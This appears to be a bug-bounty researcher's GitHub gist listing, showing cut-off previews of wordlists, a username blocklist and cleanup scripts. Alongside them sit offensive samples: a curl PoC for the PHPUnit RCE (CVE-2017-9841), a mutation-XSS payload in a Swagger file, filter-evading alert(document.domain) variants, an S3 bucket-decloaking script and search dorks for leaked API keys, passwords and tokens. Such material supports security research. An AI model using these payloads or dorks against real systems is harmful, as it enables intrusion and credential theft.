Yassine ABOUKIR yassineaboukir
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active March 27, 2024 07:26
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@yassineaboukir
yassineaboukir / gist:1501de6f60dce148824d3001e83fb263
Created September 10, 2020 11:17
PHPunit RCE PoC (CVE-2017-9841)
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/
@yassineaboukir
yassineaboukir / bucket-disclose.sh
Created October 5, 2021 16:55 — forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses SOAP, unicode, POST, multipart, streaming and index listing as ways of figuring it out. You do need a valid AWS access key (never the secret) to properly get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
# you need a valid key, since the errors happen only after AWS validates that the key exists. we do not need the secret key, only the access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=console.log('XSS-PoC-by-@yassineaboukir') src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
@yassineaboukir
yassineaboukir / git-remove.sh
Created May 31, 2019 15:14
remove .git files recursively
# Remove every .git directory, .gitignore and .gitmodules file below the current directory.
# -print0 / xargs -0 keep paths containing spaces or newlines intact.
( find . -type d -name ".git" -print0 \
&& find . -name ".gitignore" -print0 \
&& find . -name ".gitmodules" -print0 ) | xargs -0 rm -rf
@yassineaboukir
yassineaboukir / gist:726992bd1f0a4eb637d150b7b5c66079
Last active December 7, 2022 16:09
List of reserved names to blacklist from registration/username claim for security reasons and RFC compliance
abuse
admin
administrator
ftp
hostmaster
info
is
it
list
list-request
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@yassineaboukir
yassineaboukir / all.txt
Created February 15, 2020 09:04 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@yassineaboukir
yassineaboukir / Electron app decompiling
Created June 12, 2019 01:10
Obtain the source code of Electron applications
# Open terminal and install asar node module globally
$ npm install -g asar
# Go into the app’s directory, in our case it’s Slack
$ cd /Applications/Slack.app/Contents/Resources
# Create a directory to paste the content of app